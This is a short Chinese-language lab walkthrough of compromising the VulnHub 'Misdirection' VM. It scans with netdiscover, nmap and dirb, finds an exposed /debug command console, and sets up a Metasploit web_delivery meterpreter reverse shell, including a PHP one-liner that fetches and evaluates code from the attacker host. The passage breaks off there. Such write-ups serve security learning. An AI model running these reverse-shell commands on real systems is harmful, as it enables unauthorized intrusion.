本周实践的是vulnhub的Misdirection镜像,下载地址,https://download.vulnhub.com/misdirection/Misdirection.zip,用workstation导入成功,做地址扫描,sudo netdiscover -r 192.168.220.0/24,获取到靶机地址是192.168.220.166,接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.220.166,发现靶机有8080端口的http服务,继续做路径扫描,dirb http://192.168.220.166:8080,获取到http://192.168.220.166:8080/debug,浏览器访问http://192.168.220.166:8080/debug,是个可以执行命令的web console,id确认没问题,在kali攻击机上制作反弹shell脚本,并开启反弹shell监听,msfconsole,use exploit/multi/script/web_deliveryset target 1set payload php/meterpreter/reverse_tcpset lhost 192.168.220.157exploitphp -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.220.157:8080/7oVVD731', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"在靶机的web console中
………………………………